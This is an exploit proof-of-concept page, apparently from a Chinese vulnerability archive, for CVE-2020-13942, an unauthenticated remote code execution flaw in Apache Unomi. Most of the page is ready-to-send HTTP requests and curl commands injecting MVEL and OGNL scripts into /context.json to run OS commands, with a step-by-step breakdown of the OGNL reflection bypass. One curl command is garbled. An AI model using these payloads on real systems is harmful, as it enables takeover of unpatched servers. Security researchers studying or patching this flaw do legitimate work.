关联漏洞
标题:
Apache Unomi 注入漏洞
(CVE-2020-13942)
描述:Apache Unomi是美国阿帕奇软件(Apache Software)基金会的一套开源的客户数据平台。该平台主要使用Java语言编写。 Apache Unomi 1.5.2之前版本存在注入漏洞,该漏洞源于可以将恶意的OGNL或MVEL脚本注入/context.json公共端点。
描述
CVE-2020-13942 unauthenticated RCE POC through MVEL and OGNL injection
介绍
# CVE-2020-13942
## CVE-2020-13942 POC by Eugene Rojavski
Original blog post about the vulnerability:
https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
There are two RCE vectors: through MVEL injection and through OGNL injection. Both vectors target different code though the payloads look relatively similar.
The previous CVE fix https://nvd.nist.gov/vuln/detail/CVE-2020-11975 tried to limit execution of OGNL expressions, but completely missed MVEL. The CVE-2020-13942 bypasses the fix made in 1.5.1.
Send the following HTTP requests using BurpSuite or curl to context.js\json exposed by Unomi server and get RCE. Change Host and Content-length according to your target URL and OS command.
Both POCs can get `HTTP/1.1 400 Header Folding` in response, which means `\r\n` are messed up in the payload, try copy-pasting it once more.
### 1) MVEL POC
#### HTTP request
```
POST /context.json HTTP/1.1
Host: localhost:8181
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 486
{
"filters": [
{
"id": "boom",
"filters": [
{
"condition": {
"parameterValues": {
"": "script::Runtime r = Runtime.getRuntime(); r.exec(\"gnome-calculator\");"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "boom"
}
```
#### Curl
```
curl -X POST http://localhost:8181/context.json --header 'Content-type: application/json' --data '{"filters":[{"id":"boom ","filters":[{"condition":{"parameterValues":{"propertyName":"prop","comparisonOperator":"equals","propertyValue":"script::Runtime r=Runtime.getRuntime();r.exec(\"gnome-calculator\");"},"type":"profilePropertyCondition"}}]}],"sessionId":"boom"}'
```
### 2) OGNL POC
OGNL POC bypassed the ClassLoader restriction introduced by 1.5.1 version. Using Java reflections API it's possible to create an object without triggering ClassLoader.loadClass method that restricts the evaluated OGNL expressions.
The payload OGNL expression breakdown:
1. The first expression `#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")` creates a java.lang.Runtime Class object, where #this is the reference to the context object.
2. The second expression `#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]` gets the methods list of the Runtime class through reflections and chooses getRuntime method out of the list. The `{^ #this.name.equals(\"getRuntime\")}` part of the expression looks for a Method with the name getRuntime and returns a list of the Methods that match the condition; the first and the only Method of this list is getRuntime.
3. The third expression `#runtimeobject = #runtimemethod.invoke(null,null)` calls the getRuntime() method and obtains the Runtime object.
4. The fourth expression `(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0])` gets the methods of the Runtime class and retrieves Runtime.exec() with a single String argument out of the method list.
5. The final expression `#execmethod.invoke(#runtimeobject,\"gnome-calculator\")` calls Runtime.exec() with the specified argument.
#### HTTP request
```
POST /context.json HTTP/1.1
Host: localhost:8181
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 1068
{
"personalizations":[
{
"id":"gender-test",
"strategy":"matching-first",
"strategyOptions":{
"fallback":"var2"
},
"contents":[
{
"filters":[
{
"condition":{
"parameterValues":{
"propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\" gnome-calculator\"))",
"comparisonOperator":"equals",
"propertyValue":"male"
},
"type":"profilePropertyCondition"
}
}
]
}
]
}
],
"sessionId":"boom"
}
```
#### Curl
```
curl -XPOST http://localhost:8181/context.jsonder 'Content-Type: application/json' --data '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName": "(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"gnome-calculator\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"boom"}'
```
### Disclaimer
All the information provided on this page is for educational purposes only. The information on this website should only be used to enhance the security for your computer systems and not for causing malicious or damaging attacks.
You should not misuse this information to gain unauthorized access into computer systems. Also be aware, performing hack attempts on computers that you do not own, without written permission from owners, is illegal.
I will not be responsible for any direct or indirect damage caused due to the usage of the information provided on this website.
文件快照
[4.0K] /data/pocs/dd624408b3aca7f49063d09d0fc610e1a8699b62
└── [6.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。